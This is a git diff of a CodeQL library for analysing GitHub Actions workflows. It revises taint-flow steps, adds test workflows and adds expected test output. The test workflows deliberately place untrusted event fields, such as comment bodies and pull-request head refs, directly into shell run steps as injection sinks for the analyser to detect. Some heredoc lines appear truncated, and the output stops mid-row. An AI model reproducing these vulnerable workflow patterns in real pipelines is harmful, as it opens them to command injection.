downloadeded artifact. */ private class ArtifactToOptionSource extends RemoteFlowSource { - ArtifactToOptionSource() { this.asExpr() instanceof ArtifactDownloadStep } + ArtifactToOptionSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "Step output from Artifact" } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 3988f2190ab2..4e0496150450 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -23,46 +23,57 @@ class AdditionalTaintStep extends Unit { } /** - * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. + * Holds if a Run step declares an environment variable, uses it in its script to set another env var. * e.g. - * - name: Extract and Clean Initial URL - * id: extract-url * env: * BODY: ${{ github.event.comment.body }} * run: | - * echo "::set-output name=foo::$BODY" - * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT - * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" + * echo "foo=$(echo $BODY)" >> $GITHUB_ENV */ -predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string varName, string key, string value | - c = any(DataFlow::FieldContent ct | ct.getName() = key.replaceAll("output\\.", "")) and +predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string varName, string value | run.getInScopeEnvVarExpr(varName) = pred.asExpr() and - Utils::writeToGitHubOutput(run, key, value) and - value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and + Utils::writeToGitHubEnv(run, _, value) and + value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 and succ.asExpr() = run ) } +class EnvToRunTaintStep extends AdditionalTaintStep { + override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) } +} + /** - * Holds if a Run step declares an environment variable, uses it in its script to set another env var. + * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. * e.g. + * - name: Extract and Clean Initial URL + * id: extract-url * env: * BODY: ${{ github.event.comment.body }} * run: | - * echo "foo=$(echo $BODY)" >> $GITHUB_ENV + * echo "::set-output name=foo::$BODY" + * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT + * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" */ -predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Run run, string varName, string value | - run.getInScopeEnvVarExpr(varName) = pred.asExpr() and - Utils::writeToGitHubEnv(run, _, value) and - value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 and - succ.asExpr() = run +predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(Run run, string varName, string key, string value | + c = any(DataFlow::FieldContent ct | ct.getName() = key) and + pred.asExpr() = run.getInScopeEnvVarExpr(varName) and + succ.asExpr() = run and + Utils::writeToGitHubOutput(run, key, value) and + value.matches("%$" + ["", "{", "ENV{"] + varName + "%") ) } -class EnvToRunTaintStep extends AdditionalTaintStep { - override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) } +predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(Run run, string varName, string key, string value | + c = any(DataFlow::FieldContent ct | ct.getName() = key) and + pred.asExpr() = run.getInScopeEnvVarExpr(varName) and + // we store the taint on the enclosing job since the may not exist an implicit env attribute + succ.asExpr() = run.getEnclosingJob() and + Utils::writeToGitHubEnv(run, key, value) and + value.matches("%$" + ["", "{", "ENV{"] + varName + "%") + ) } /** @@ -71,29 +82,40 @@ class EnvToRunTaintStep extends AdditionalTaintStep { * - run: echo "::set-output name=id::$(> $GITHUB_OUTPUT - echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT - echo "CHANGELOGEOF" >> $GITHUB_OUTPUT - run: | - EOF=$(dd if=/dev/urandom bs=15 count=1 status=none | base64) - echo "status<<$EOF" >> $GITHUB_OUTPUT - echo "$(cat status.output.json)" >> $GITHUB_OUTPUT - echo "$EOF" >> $GITHUB_OUTPUT - run: | - echo "response<<$EOF" >> $GITHUB_OUTPUT - echo $output >> $GITHUB_OUTPUT - echo "$EOF" >> $GITHUB_OUTPUT - run: | - { - echo 'JSON_RESPONSE<> "$GITHUB_ENV" + echo "changelog<> $GITHUB_OUTPUT + echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT + echo "CHANGELOGEOF" >> $GITHUB_OUTPUT + - run: | + EOF=$(dd if=/dev/urandom bs=15 count=1 status=none | base64) + echo "status<<$EOF" >> $GITHUB_OUTPUT + echo "$(cat status.output.json)" >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + - run: | + echo "response<<$EOF" >> $GITHUB_OUTPUT + echo $output >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - run: | + cat <<-"EOF" > event.json + ${{ toJson(github.event) }} + EOF diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index a6be2226b8c3..c08d4c824e1a 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1,2 +1,521 @@ -ERROR: Could not resolve predicate extractLineAssignment/4 (test.ql:85,5-33) -ERROR: Could not resolve predicate extractLineAssignment/4 (test.ql:103,5-33) +files +| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | +| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | +| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | +workflows +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/test.yml:1:1:40:53 | on: push | +reusableWorkflows +compositeActions +jobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +localJobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +extJobs +steps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runSteps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | +runExprs +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +uses +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +stepUses +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +usesArgs +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +runStepChildren +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +parentNodes +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:11:15:11:33 